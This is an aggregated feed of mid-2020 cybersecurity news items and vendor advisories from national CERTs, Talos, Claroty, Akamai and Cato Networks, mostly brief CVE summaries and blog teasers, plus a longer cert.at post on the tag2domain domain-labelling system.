Active ransomware attacks have continued in Finland. A successful ransomware campaign can paralyse organisations that have not prepared adequately. We recommend that you brush up on how ransomware attacks work and how to protect yourself against them.

https://www.kyberturvallisuuskeskus.fi/en/news/active-ransomware-attacks-continue
Cyber exercises helped Keva prepare for real-world threats
2020-08-10T08:53:53Z | 1597049633

Is your organisation interested in cyber exercises, but unsure of where to begin? The National Cyber Security Centre Finland (NCSC-FI) provides regular support to organisations undertaking cyber exercises, and we have asked some of these organisations to write about the experience. The first entry comes from public sector pension provider Keva.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-exercises-helped-keva-prepare-real-world-threats
Cyber exercises helped Keva prepare for real-world threats
2020-08-10T08:53:53Z | 1597049633

Is your organisation interested in cyber exercises, but unsure of where to begin? The National Cyber Security Centre Finland (NCSC-FI) provides regular support to organisations undertaking cyber exercises, and we have asked some of these organisations to write about the experience. The first entry comes from public sector pension provider Keva.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-exercises-helped-keva-prepare-real-world-threats
Ruchita Biradar - My Virtual Internship at Akamai
2020-08-10T04:00:00Z | 1597032000

The year is 2020, and the Coronavirus has affected life around the world in so many ways. For me, a third-year engineering student at R.V. Bangalore , I was looking forward to starting my internship at Akamai when the pandemic took hold, and suddenly everything seemed so uncertain.

https://www.akamai.com/blog/culture/ruchita-biradar-my-virtual-internship-at-akamai
IT Roundtable: Lessons Learned About SASE and Remote Access
2020-08-09T12:36:25Z | 1596976585

The post IT Roundtable: Lessons Learned About SASE and Remote Access appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-30
Accidentally stepping on a DeFi lego
2020-08-05T11:00:03Z | 1596625203

The initial release of yVault contained logic for computing the price of yUSDC that could be manipulated by an attacker to drain most (if not all) of the pool’s assets. Fortunately, Andre, the developer, reacted incredibly quickly and disabled the faulty code, securing the approximately 400,000 USD held at the time. However, this bug still […]

https://blog.trailofbits.com/2020/08/05/accidentally-stepping-on-a-defi-lego/
The disadvantages of VPNs for Enterprises
2020-08-05T07:19:02Z | 1596611942

The COVID-19 outbreak led to a surge in business VPN usage in an extremely short timeframe. In fact, multiple regions saw VPN usage rise over 200% in a matter of weeks. In many cases, remote access VPNs enabled enterprises to get work from home initiatives off the ground quickly and keep their business running, despite... The post The disadvantages of VPNs for Enterprises appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-disadvantages-of-vpns-for-enterprises/
20 Years of Edge Computing
2020-08-05T04:00:00Z | 1596600000

How long will you wait for something? That depends on what you're waiting for, of course. But in your daily interactions, think about how many "things" you interact with where you expect the response to be instantaneous -- tapping on mobile apps; logging in and transacting with a retailer or a bank; selecting and viewing content on a streaming media device; interacting with a connected device like a light, doorbell, or even a car; or checking in for a train or flight.

https://www.akamai.com/blog/news/20-years-of-edge-computing
Juunis iseloomustasid Eesti küberruumi arvepettused, meilikonto kompromiteerimised ja õngitsuskirjad
2020-08-04T09:06:03Z | 1596531963

Riigi Infosüsteemi Ameti (RIA) igakuine ülevaade Eesti küberruumis toimuvast keskendub haiglat tabanud arvepettusele, Eesti ühe spordialaliidu meilikonto jälgimisele ja ikka õngitsuskirjadele.

https://ria.ee/uudised/juunis-iseloomustasid-eesti-kuberruumi-arvepettused-meilikonto-kompromiteerimised-ja
SoftPerfect RAM Disk spvve.sys 0x222004 arbitrary file deletion vulnerability
2020-08-04T00:00:00Z | 1596499200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1121
SoftPerfect RAM Disk spvve.sys 0x222024 information disclosure vulnerability
2020-08-04T00:00:00Z | 1596499200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1122
Question Quiz?The Forgotten Scam
2020-07-31T01:48:00Z | 1596160080

Over a year ago, Akamai?s threat research team published research regarding a widely-used phishing toolkit we referred to as the ?Three Question Quiz?. It?s now time to review the evolution of the toolkit, the associated campaigns that we tracked in the wild, and the potential damage caused by those campaigns in the past year.

https://www.akamai.com/blog/security/question-quiz-the-forgotten-scam
Microsoft Azure Sphere Normal World application ptrace unsigned code execution vulnerability
2020-07-31T00:00:00Z | 1596153600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1090
Microsoft Azure Sphere asynchronous ioctl denial-of-service vulnerability
2020-07-31T00:00:00Z | 1596153600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1117
Microsoft Azure Sphere Normal World application /proc/self/mem unsigned code execution vulnerability
2020-07-31T00:00:00Z | 1596153600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1093
Microsoft Azure Sphere mtd character device driver privilege escalation vulnerability
2020-07-31T00:00:00Z | 1596153600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1132
Microsoft Azure Sphere kernel message ring buffer Information Disclosure Vulnerability
2020-07-31T00:00:00Z | 1596153600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1089
Microsoft Azure Sphere ASXipFS inode type privilege escalation vulnerability
2020-07-31T00:00:00Z | 1596153600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1131
Microsoft Azure Sphere AF_AZSPIO socket memory corruption vulnerability
2020-07-31T00:00:00Z | 1596153600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1118
Results of the 2020 FIRST Board of Directors
2020-07-30T00:00:00Z | 1596067200

The results of the 2020 FIRST Board of Directors election follow: Alexander Jaeger (Google IRT) Serge Droz (Liaison,Proton-CERT) Dave Schwartzburg (Cisco Systems) Javier Berciano (Liaison,One eSecurity) Shawn Richardson (NVIDIA) The full board list can be found here. Thank you to all of the candidates who ran in the election.

https://www.first.org/newsroom/news/20200730
CVE-2020-14523
2020-07-30T00:00:00Z | 1596067200

PATH TRAVERSAL CWE-22 Multiple Mitsubishi Electric Factory Automation products have a vulnerability that allows an attacker to execute arbitrary code.

https://claroty.com/team82/disclosure-dashboard/cve-2020-14523
CVE-2020-14521
2020-07-30T00:00:00Z | 1596067200

UNQUOTED SEARCH PATH OR ELEMENT CWE-428 Multiple Mitsubishi Electric Factory Automation engineering software products have a malicious code execution vulnerability. A malicious attacker could use this vulnerability to obtain information, modify information, and cause a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2020-14521
CVE-2020-14520
2020-07-30T00:00:00Z | 1596067200

MISSING AUTHORIZATION CWE-862 The affected product is vulnerable to an information leak, which may allow an attacker to obtain sensitive information. An HTTP request to the unprotected API could be used to determine whether an arbitrary file path exists on the filesystem. No authentication is required to perform this exploit.

https://claroty.com/team82/disclosure-dashboard/cve-2020-14520
CVE-2020-14496
2020-07-30T00:00:00Z | 1596067200

PERMISSION ISSUES CWE-275 Successful exploitation of this vulnerability could allow an attacker to escalate privilege and execute malicious programs, which could cause a denial-of-service condition, and allow information to be disclosed, tampered with, and/or destroyed.

https://claroty.com/team82/disclosure-dashboard/cve-2020-14496
Security Alert (A20-07-09): Multiple Vulnerabilities in Firefox
2020-07-29T04:00:00Z | 1595995200

Mozilla has published three security advisories (MFSA 2020-30, MFSA 2020-31 and MFSA 2020-32) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Large, Complex DDoS Attacks on the Rise in 2020
2020-07-28T20:04:00Z | 1595966640

While we've highlighted both record PPS and BPS attacks mitigated on the Akamai Prolexic Platform over the past few weeks, these attacks are part of a broader trend of increasingly large and complex DDoS activity. We have seen clear indications across the industry of high-water mark DDoS attacks being publicized by multiple vendors. The sheer number of large attacks has been unprecedented. The attacks are also noteworthy for their increasing complexity, illustrated in the number and combinations of different attack vectors. The tenacity of attackers is also increasing -- one Akamai customer experienced 14 separate 100+ Gbps attacks in just the first half of 2020. "What's new is the concept of campaigns. We go back a couple of years, and 'attack' was the right word to use. There were many attacks every single day, but they weren't, in my opinion, campaign-oriented. Some of our more recent ones are campaign-oriented, where the attacker is working in a coordinated way over an extended period of time." -- Roger Barranco, Vice President, Global Security Operations, Akamai Some likely reasons for the rise in attacks are a combination of: The proliferation of DDoS-for-hire tools Emerging botnets (enterprise DVRs, IoT, etc.) entering the scene Plenty of motivating factors across social, geopolitical, and online unrest Quarantine and boredom -- what's a malicious actor supposed to do? Whatever the unique reason of each attack, the result is the same: a security and IT team needs an effective defense.

https://www.akamai.com/blog/security/large--complex-ddos-attacks-on-the-rise-in-2020
Domain names are actively marketed to fi-domain name holders
2020-07-28T11:19:18Z | 1595935158

Domain names are marketed actively and, at regular intervals, even aggressively. It is worthwhile to consider in advance which domain names you need or want for yourself or for your company. The easiest way is to register all of the domain names of your choice using the same registrar. On the internet, several hundreds of different domain names can be used, and it is not by any means practical to register all of them for yourself.

https://www.kyberturvallisuuskeskus.fi/en/news/domain-names-are-actively-marketed-fi-domain-name-holders
Domain names are actively marketed to fi-domain name holders
2020-07-28T11:19:18Z | 1595935158

Domain names are marketed actively and, at regular intervals, even aggressively. It is worthwhile to consider in advance which domain names you need or want for yourself or for your company. The easiest way is to register all of the domain names of your choice using the same registrar. On the internet, several hundreds of different domain names can be used, and it is not by any means practical to register all of them for yourself.

https://www.kyberturvallisuuskeskus.fi/en/news/domain-names-are-actively-marketed-fi-domain-name-holders
Why Cato will beat legacy techs in the SASE race
2020-07-28T10:35:16Z | 1595932516

In a recent article, a Fortinet executive said: “It’s impossible for a company like a Cato to build all these things out. It’s just incredibly hard for a small company.”. Here is my take. It is true that Cato’s vision is one the biggest undertakings in IT infrastructure over the past two decades. We set... The post Why Cato will beat legacy techs in the SASE race appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-cato-will-beat-legacy-techs-in-the-sase-race/
Don’t forget information security when dealing with IT equipment waste
2020-07-28T06:36:13Z | 1595918173

The recycling and reuse of IT equipment is often neglected in the context of organisations’ data management. However, careless data management at the end of a device’s life cycle may jeopardise earlier measures to ensure an adequate level of information security and data protection. Under the Waste Act, IT equipment waste must be reused to the greatest extent possible, and the responsibility for managing the waste lies with its producer. When done carelessly, reusing IT equipment may increase the risk of a data leak. The requirements regarding information security, data protection and recycling can all be fulfilled, however, as the case of the Kanta-Häme health care district illustrates.

https://www.kyberturvallisuuskeskus.fi/en/news/dont-forget-information-security-when-dealing-it-equipment-waste
Don’t forget information security when dealing with IT equipment waste
2020-07-28T06:36:13Z | 1595918173

The recycling and reuse of IT equipment is often neglected in the context of organisations’ data management. However, careless data management at the end of a device’s life cycle may jeopardise earlier measures to ensure an adequate level of information security and data protection. Under the Waste Act, IT equipment waste must be reused to the greatest extent possible, and the responsibility for managing the waste lies with its producer. When done carelessly, reusing IT equipment may increase the risk of a data leak. The requirements regarding information security, data protection and recycling can all be fulfilled, however, as the case of the Kanta-Häme health care district illustrates.

https://www.kyberturvallisuuskeskus.fi/en/news/dont-forget-information-security-when-dealing-it-equipment-waste
freeDiameter freeDiameterd Denial of Service Vulnerability
2020-07-28T00:00:00Z | 1595894400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1030
CVE-2020-14524
2020-07-28T00:00:00Z | 1595894400

HEAP-BASED BUFFER OVERFLOW CWE-122 The affected product is vulnerable to a heap-based buffer overflow, which may allow an attacker to remotely execute arbitrary code. Read more: "Team82 Finds Critical Flaws in OPC Protocol"

https://claroty.com/team82/disclosure-dashboard/cve-2020-14524cve-2020-14522
CVE-2020-14522
2020-07-28T00:00:00Z | 1595894400

UNCONTROLLED RESOURCE CONSUMPTION CWE-400 The affected product is vulnerable to uncontrolled resource consumption, which may allow an attacker to cause a denial-of-service condition. Read more: "Team82 Finds Critical Flaws in OPC Protocol"

https://claroty.com/team82/disclosure-dashboard/cve-2020-14522
CVE-2020-14512
2020-07-28T00:00:00Z | 1595894400

USE OF PASSWORD HASH WITH INSUFFICIENT COMPUTATIONAL EFFORT CWE-916 The affected product uses a weak hash type, which may allow an attacker to view user passwords. Read more: Getting from 5 to 0: VPN Security Flaws Pose Cyber Risk to Organizations with Remote OT Personnel

https://claroty.com/team82/disclosure-dashboard/cve-2020-14512
CVE-2020-14510
2020-07-28T00:00:00Z | 1595894400

USE OF HARD-CODED CREDENTIALS CWE-798 The affected product contains a hard-coded credential for telnet, allowing an unprivileged attacker to execute commands as root. Read more: Getting from 5 to 0: VPN Security Flaws Pose Cyber Risk to Organizations with Remote OT Personnel

https://claroty.com/team82/disclosure-dashboard/cve-2020-14510
CVE-2020-14508
2020-07-28T00:00:00Z | 1595894400

OFF-BY-ONE ERROR CWE-193 The affected product is vulnerable to an off-by-one error, which may allow an attacker to remotely execute arbitrary code or cause a denial-of-service condition. Read more: Getting from 5 to 0: VPN Security Flaws Pose Cyber Risk to Organizations with Remote OT Personnel

https://claroty.com/team82/disclosure-dashboard/cve-2020-14508
Cloud Native, COVID-19, and True Secure Access Service Edge – What The 2020 Gartner Hype Cycles Taught Us
2020-07-27T13:23:32Z | 1595856212

For the second year in a row, Cato Networks was recognized as a Sample Vendor in the Secure Access Service Edge (SASE) category in the Gartner Hype Cycle for Enterprise Networking, 2020.1 Cato was also recognized as Sample Vendor in three other categories including SD-WAN, Firewall as a Service (FWaaS), and Zero Trust Network Access (ZTNA)... The post Cloud Native, COVID-19, and True Secure Access Service Edge – What The 2020 Gartner Hype Cycles Taught Us appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-the-2020-gartner-hype-cycles-taught-us-about-sase/
FIRST releases its 2019-20 Annual Report
2020-07-27T00:00:00Z | 1595808000

July 27th, 2020 - The Forum of Incident Response and Security Teams (FIRST) is proud to publish its fourth Annual Report today. The report details the organization’s achievements towards building a mature global incident response community. It covers the period between the 2019 conference in Edinburgh, Scotland and July 2020. FIRST Annual Report 2019-2020

https://www.first.org/newsroom/releases/20200727
FIRST releases its 2019-20 Annual Report
2020-07-27T00:00:00Z | 1595808000

July 27th, 2020 - The Forum of Incident Response and Security Teams (FIRST) is proud to publish its fourth Annual Report today. The report details the organization’s achievements towards building a mature global incident response community. It covers the period between the 2019 conference in Edinburgh, Scotland and July 2020. FIRST Annual Report 2019-2020

https://www.first.org/newsroom/releases/20200727
CVE-2020-14500
2020-07-25T00:00:00Z | 1595635200

IMPROPER NEUTRALIZATION OF NULL BYTE OR NUL CHARACTER CWE-158 An attacker can send a negative value and overwrite arbitrary data. Read more: Getting from 5 to 0: VPN Security Flaws Pose Cyber Risk to Organizations with Remote OT Personnel

https://claroty.com/team82/disclosure-dashboard/cve-2020-14500
High Threat Security Alert (A20-07-08): Multiple Vulnerabilities in Cisco Products
2020-07-24T04:00:00Z | 1595563200

Cisco released security advisories to address vulnerabilities in the Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software as well as in the Treck IP stack implementation.

https://www.govcert.gov.hk/en/alerts_detail.php
Hybrid Clouds and SD-WAN in a Snap
2020-07-22T07:44:19Z | 1595403859

The post Hybrid Clouds and SD-WAN in a Snap appeared first on Cato Networks.

https://www.catonetworks.com/thank-you-demo/
Scams and vulnerabilities made for dreary cyber weather in June
2020-07-21T10:51:52Z | 1595328712

June saw rainy cyber weather with some stormy spells. Phone and email scams have shown a predictable increase during the summer holiday season. Phishing email chains designed to carry out security breaches were also observed. The past few weeks have also seen a number of critical vulnerabilities. Our cyber weather report now illustrates the development of cyber threats with the help of arrow symbols.

https://www.kyberturvallisuuskeskus.fi/en/news/scams-and-vulnerabilities-made-dreary-cyber-weather-june
Scams and vulnerabilities made for dreary cyber weather in June
2020-07-21T10:51:52Z | 1595328712

June saw rainy cyber weather with some stormy spells. Phone and email scams have shown a predictable increase during the summer holiday season. Phishing email chains designed to carry out security breaches were also observed. The past few weeks have also seen a number of critical vulnerabilities. Our cyber weather report now illustrates the development of cyber threats with the help of arrow symbols.

https://www.kyberturvallisuuskeskus.fi/en/news/scams-and-vulnerabilities-made-dreary-cyber-weather-june
CVE-2020-12499
2020-07-21T00:00:00Z | 1595289600

IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY CWE-22The build settings of a PLCnext Engineer project (.pcwex) can be manipulated in a way that can result in the execution of remote code. The attacker needs to get access to a PLCnext Engineer project to be able to manipulate files inside. Additionally, the files of the remote code need to be transferred to a location which can be accessed by the PC that runs PLCnext Engineer. When PLCnext Engineer runs a build process of the manipulated project the remote code can be executed.

https://claroty.com/team82/disclosure-dashboard/cve-2020-12499
ID-kaardi tarkvara järgmine versioon toob kaasa mitu olulist muudatust
2020-07-20T09:55:02Z | 1595238902

Järgmine versioon ID-kaardi tarkvarast (ver. 2020.09) on plaanis kasutajatele avalikustada selle aasta septembris. Üks suuremaid muudatusi on tembeldamisrakenduse TeRa toe lõpp.

https://ria.ee/uudised/id-kaardi-tarkvara-jargmine-versioon-toob-kaasa-mitu-olulist-muudatust
The curious case of “How many decoys do I need?”
2020-07-20T06:03:16Z | 1595224996

Decoys can be deployed everywhere in your network – current-gen deception technology makes that possible. There are however no free lunches and pervasive deception might come with a cost. So the question is, should you?

https://www.smokescreen.io/how-many-decoys-do-i-need/
SonicOS SSLVPN External Service Interaction (DNS) Vulnerability
2020-07-16T09:26:48Z | 1594891608

SonicOS SSLVPN LDAP login request allows remote attackers to cause external service interaction (DNS) due to improper validation of the request. This vulnerability impact SonicOS version 6.5.4.4-44n and earlier. CVE: CVE-2020-5130 Last updated: July 16, 2020, 9:26 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0003
SonicWall NetExtender arbitrary file write vulnerability
2020-07-16T09:01:55Z | 1594890115

SonicWall NetExtender Windows client vulnerable to arbitrary file write vulnerability, this allows attacker to overwrite a DLL and execute code with the same privilege in the host operating system. CVE: CVE-2020-5131 Last updated: July 16, 2020, 9:01 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0004
Security Alert (A20-07-07): Multiple Vulnerabilities in Apple iOS and iPadOS
2020-07-16T04:00:00Z | 1594872000

Apple has released iOS 13.6 and iPadOS 13.6 to fix multiple vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
SD-WAN: Designed for Completeness?
2020-07-15T08:39:34Z | 1594802374

Completeness, as defined by Oxford Dictionary, is “the state or condition of having all the necessary or appropriate parts.” Let’s analyze SD-WAN’s completeness according to this definition. SD-WAN delivers various benefits compared to legacy WANs, mainly offering enterprises cost optimization, agility, and simplicity. To achieve this Gartner outlined four characteristics an SD-WAN solution should include:... The post SD-WAN: Designed for Completeness? appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-designed-for-completeness/
High Threat Security Alert (A20-07-05): Multiple Vulnerabilities in Microsoft Products (July 2020)
2020-07-15T04:00:00Z | 1594785600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-07-06): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2020)
2020-07-15T04:00:00Z | 1594785600

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Siemens LOGO! Web Server Code Execution Vulnerability
2020-07-15T00:00:00Z | 1594771200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1069
CVE-2020-14498
2020-07-15T00:00:00Z | 1594771200

STACK-BASED BUFFER OVERFLOW CWE-121 The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code. Read more: "All Roads Lead to OpenVPN: Pwning Industrial Remote Access Clients"

https://claroty.com/team82/disclosure-dashboard/cve-2020-14498
Intel IGC64.DLL shader functionality DCL_INDEXABLETEMP code execution vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0980
Intel IGC64.DLL Shader Functionality hull shader denial of service vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0983
AMD Radeon DirectX 11 Driver atidxx64.dll Shader Functionality ROUND_NI Code Execution Vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1043
AMD Radeon DirectX 11 Driver atidxx64.dll Shader Functionality DCL_OUTPUT Code Execution Vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1041
AMD Radeon DirectX 11 Driver atidxx64.dll Shader Functionality RESOURCE Code Execution Vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1042
Intel IGC64.DLL shader functionality ATOMIC_ADD code execution vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0979
Intel IGC64.DLL Shader Functionality DCL_OUTPUT code execution vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0978
Intel IGC64.DLL shader functionality realloc code execution vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0981
Intel IGC64.DLL Shader Functionality HeapReAlloc code execution vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0982
AMD Radeon DirectX 11 Driver atidxx64.dll Shader Functionality MOV REG Code Execution Vulnerability
2020-07-14T00:00:00Z | 1594684800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1040
CVE-2020-7520
2020-07-14T00:00:00Z | 1594684800

URL REDIRECTION TO UNTRUSTED SITE ('Open Redirect') CWE-601vulnerability exists in Schneider Electric Software Update (SESU), V2.4.0 and prior, which could cause execution of malicious code on the victim's machine. In order to exploit this vulnerability, an attacker requires privileged access on the engineering workstation to modify a Windows registry key which would divert all traffic updates to go through a server in the attacker's possession. A man-in-the-middle attack is then used to complete the exploit.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7520
Já está disponível o Boletim 3/2020 do Observatório de Cibersegurança
2020-07-13T00:00:00Z | 1594598400

Para além do balanço do número de incidentes registados pelo CERT.PT no primeiro semestre de 2020, o Boletim apresenta ainda uma análise de conteúdo aos incidentes de phishing registados durante o segundo trimestre. Também é possível encontrar neste documento a referência a alguns documentos que apresentam dados relevantes sobre os incidentes de cibersegurança durante o período de confinamento, além de dados anuais relativos a 2019. Para consultar o documento clique aqui .

https://dyn.cncs.gov.pt/pt/detalhe/art/619/ja-esta-disponivel-o-boletim-32020-do-observatorio-de-ciberseguranca
Contract verification made easier
2020-07-12T19:00:46Z | 1594580446

Smart contract authors can now express security properties in the same language they use to write their code (Solidity) and our new tool, manticore-verifier, will automatically verify those invariants. Even better, Echidna and Manticore share the same format for specifying property tests. In other words, smart contract authors can now write one property test and […]

https://blog.trailofbits.com/2020/07/12/new-manticore-verifier-for-smart-contracts/
Lunavararünnakud on muutunud jõhkramaks
2020-07-10T09:54:05Z | 1594374845

Riigi Infosüsteemi Ameti (RIA) küberruumi teise kvartali ülevaatest selgub, et lunavararünnakute taktika on muutunud järjest jõhkramaks, sest lisaks andmete krüpteerimisele need ka varastatakse ja ähvardatakse avalikustada.

https://ria.ee/uudised/lunavararunnakud-muutunud-johkramaks
Glacies IceHRM Admin Reports SQL injection Vulnerability
2020-07-10T00:00:00Z | 1594339200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1067
tag2domain - a system for labeling DNS domains
2020-07-09T15:46:55Z | 1594309615

Tag2domain - doing proper statistics on domain names In the course of nic.at’s Connecting Europe Facilities (CEF) project CEF-TC-2018-3 we were able to focus on some long overdue but relevant research: a tagging / labeling database of domain names (in the following, we will use the words “tag” and “label” interchangeably). This project was also presented at the Registry Data Nerds (RDN) virtual meeting on the 30th of June 2020. Slides are available on github. What is "tag2domain"?  Simply said, this is a structure to tag DNS domain names with arbitrary labels. Initially this seems like an easy task. However, when looked at closely, it is paramount to implement this properly. Not only will all future statistics on domains depend on a proper tagging. Doing proper statistics is anything but easy. “He who counts, will count wrongly” seems to be the motto of statistics (in German: “der, der misst, misst Mist”). Hence, any type of labeling / tagging service must Be future-proof Be flexible Encompass all possible tagging systems we might come up with in the future Easily fit into and connect to existing databases and datasets of domain names Be easily query-able Be useable for answering ad-hoc statistical questions Not an easy task. The proposed solution  We arrived – inspired by the MISP system as well as ENISA’s RIST taxonomy – at the following schema: A tagging system for a particular statistical domain shall be called “taxonomy”. A taxonomy consists of a name (e.g. the “low content domain names taxonomy”) and some meta-information (such as if it may be used for domain names or IP addresses or both).  Associated with a taxonomy, is a list of possible “tags” (i.e. labels or names which we might assign to domain names (or IP addresses)). Think of this as an enum (as in the programming language C) or a fixed list of possible values. Each taxonomy has a fixed number of tags and there should always be an “OTHER” tag which is a bucked for counting those domains which do not fall into any of the existing tags within that taxonomy. In addition, to add a second layer (and thus flexibility), tags might have values if they they are assigned to a domain name (or IP address). Example: Let’s assume, we have a taxonomy which is capable of assigning industry sectors to domains: the DIT (domain industry taxonomy). It consists of a taxonomy name (“DIT”), a fixed list of possible tags (“Agriculture, Forestry, Fishing”, “Automotive”, “Beauty and Perfume”, “Cleaning and Facility Management” , etc..). Each possible tag may have a value associated with it which is basically a sub-category. Example: “Automotive” -> “Maintenance”. In machine readable form, these taxonomies, tags and values shall be presented as:   taxonomy:tag = value Example:   DIT:Automotive = Maintenance (This is inspired by the MISP taxonomies structure. A taxonomy is thus basically a namespace for a set of tags).  It is easy to see that this structure is future-proof. If a given taxonomy does not fit your needs, it’s trivial to invent a new one with the required tags. Flexibility is also given. A taxonomy shall always be registered at the taxonomy registry (operated by CIRCL, please issue pull requests to their repository). A taxonomy shall be given in the machine-tag format.  How to use it and how to fit a taxonomy and tags to existing databases/tables of domain names?     We created a sample mapping structure including documentation on our github repository. One important thing to remember is that: Every mapping is time-dependent: a mapping of domain name to tag only exists at a specific point (or interval) in time. Therefore, any intersection tables between tags and domains (see the github link above) always need to include a timestamp which indicates validity Mappings should be done automatically. There is no golden rule on how to create a mapping. It is domain specific for each taxonomy. An example for mapping domains names to a “is a first name (Y/N)?” – tag is a word splitting algorithm which has a large dictionary of common first names. Other approaches will have to use machine learning and natural language processing libraries. Querying the tag2domain database We created a small container based microservice which implements a query interface, called “tag2domain-api”. It supports the following RESTful API endpoints: /api/v1/taxonomies/all ….get all possible taxonomies /api/v1/tags/all  … get all possible tags (for all taxonomies) /api/v1/taxonomies/bydomain/{domain}   … get all taxonomies for a given domain. /api/v1/tags/bydomain/{domain}  … get all tags for a given domain /api/v1/domains/bytag/{tag}    … get a list of all domains which match a specific tag /api/v1/domains/bytaxonomy/{taxonomy}   … get a list of all domains, which are in a specific taxonomy   Let us know, what you think. The author of this blog post can be reached via github  or at kaplan@cert.at.      This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2020/7/tag2domain
The Importance of Culture and Collaboration
2020-07-09T04:00:00Z | 1594267200

I joined Akamai Japan in June 2020. Of course, having worked in technology for my whole career, I already knew of Akamai and our strong reputation. I knew it was an intelligent company, with impressive technology, and - above all - a great story that really inspired me.

https://www.akamai.com/blog/culture/the-importance-of-culture-and-collaboration-mayuko-kiguchi-director
CVE-2020-12025
2020-07-09T00:00:00Z | 1594252800

IMPROPER RESTRICTION OF XML EXTERNAL ENTITY REFERENCE CWE-611 The affected product is vulnerable to an xml external entity (XXE) vulnerability, which may allow an attacker to view hostnames or other resources from the program.

https://claroty.com/team82/disclosure-dashboard/cve-2020-12025
CVE-2020-12005
2020-07-09T00:00:00Z | 1594252800

UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434 A vulnerability exists in the communication function that enables users to upload EDS files by FactoryTalk Linx. This may allow an attacker to upload a file with bad compression, consuming all the available CPU resources, leading to a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2020-12005
CVE-2020-12003
2020-07-09T00:00:00Z | 1594252800

IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL') CWE-22 An exposed API call allows users to provide files to be processed without sanitation. This may allow an attacker to use specially crafted requests to traverse the file system and expose sensitive data on the local hard drive.

https://claroty.com/team82/disclosure-dashboard/cve-2020-12003
CVE-2020-12001
2020-07-09T00:00:00Z | 1594252800

IMPROPER INPUT VALIDATION CWE-20 The parsing mechanism that processes certain file types does not provide input sanitation. This may allow an attacker to use specially crafted files to traverse the file system and modify or expose sensitive data or execute arbitrary code.

https://claroty.com/team82/disclosure-dashboard/cve-2020-12001
Dutch enterprises explain how they boosted Network performance, cut costs with SASE
2020-07-08T10:06:26Z | 1594202786

The post Dutch enterprises explain how they boosted Network performance, cut costs with SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/dutch-enterprises-explain-how-they-boosted-network-performance-cut-costs-with-sase/
Security Alert (A20-07-04): Multiple Vulnerabilities in Citrix Products
2020-07-08T04:00:00Z | 1594180800

Multiple vulnerabilities have been found in Citrix Application Delivery Controller, Citrix Gateway and Citrix SD-WAN WANOP.

https://www.govcert.gov.hk/en/alerts_detail.php
Network Security is Not a Sports Car
2020-07-06T11:31:13Z | 1594035073

I grabbed a beer with a close friend of mine the other night. He’s in his 30’s, recently married, and expecting his first little one. As we chat about his new life, the matter of car buying came up. “My wife told me to go look at this SUV. I know it’s the right move... The post Network Security is Not a Sports Car appeared first on Cato Networks.

https://www.catonetworks.com/blog/network-security-is-not-a-sports-car/
Cato Demo: Bi-directional QoS, advanced bandwidth management, and real-time application analytics – Jack Dolan
2020-07-06T08:48:21Z | 1594025301

The post Cato Demo: Bi-directional QoS, advanced bandwidth management, and real-time application analytics – Jack Dolan appeared first on Cato Networks.

https://www.catonetworks.com/resources/catos-sales-engineers-demo-interview-video-series-jack-dolan/
Cato Demo: How to configure VoIP and ERP optimization for 3000 employees across the world in minutes- Sylvain Chareyre
2020-07-06T08:44:36Z | 1594025076

The post Cato Demo: How to configure VoIP and ERP optimization for 3000 employees across the world in minutes- Sylvain Chareyre appeared first on Cato Networks.

